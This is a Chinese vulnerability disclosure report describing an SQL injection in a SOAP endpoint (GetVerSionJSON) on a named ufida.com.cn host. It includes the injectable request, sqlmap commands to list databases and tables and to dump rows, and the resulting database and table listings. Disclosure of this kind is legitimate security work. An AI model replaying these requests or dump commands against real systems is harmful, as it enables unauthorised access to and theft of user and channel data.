### 简要描述:
服务接口存在sql注射漏洞,泄漏全国渠道和用户信息
### 详细说明:
1、访问http://t.ufida.com.cn/,发现存在大量的开放接口,对其中的GetVerSionJSON进行测试,发现存在sql注射漏洞。
[<img src="https://images.seebug.org/upload/201505/232053486fc67f2386d8897d6dad116b3f433198.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/232053486fc67f2386d8897d6dad116b3f433198.jpg)
2、注入的请求内容如下:
```
POST /Service.asmx HTTP/1.1
Host: t.ufida.com.cn
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/GetVerSionJSON"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetVerSionJSON xmlns="http://tempuri.org/">
<Product>u8 *</Product>
</GetVerSionJSON>
</soap:Body>
</soap:Envelope>
```
执行
```
sqlmap -r /root/p.txt
```
,截图如下:
[<img src="https://images.seebug.org/upload/201505/23205621f832ea7a18db031d881780399e5daab3.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/23205621f832ea7a18db031d881780399e5daab3.jpg)
3、列库、表、内容等
```
sqlmap -r /root/p.txt --dbs
```
```
available databases [9]:
[*] fwsbm
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] tong
[*] tongtest
```
列表:
```
sqlmap -r /root/p.txt -D tong --tables
```
Database: tong
[163 tables]
+-------------------------+
| Alert |
| All_user |
| Business |
| CModule |
| Cnewsweb |
| D99_CMD |
| D99_Tmp |
| DBName |
| DD_821 |
| DD_821s |
| DD_850 |
| DD_850s |
| Demo |
| IM_message |
……
列表的内容:
```
sqlmap -r /root/p.txt -D tong -T ytqdxx --dump --start 1 --stop 10
```
[<img src="https://images.seebug.org/upload/201505/23210136012ee4dcfa629ab536182bf41e022ba5.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/23210136012ee4dcfa629ab536182bf41e022ba5.jpg)
### 漏洞证明:
参考截图证明
暂无评论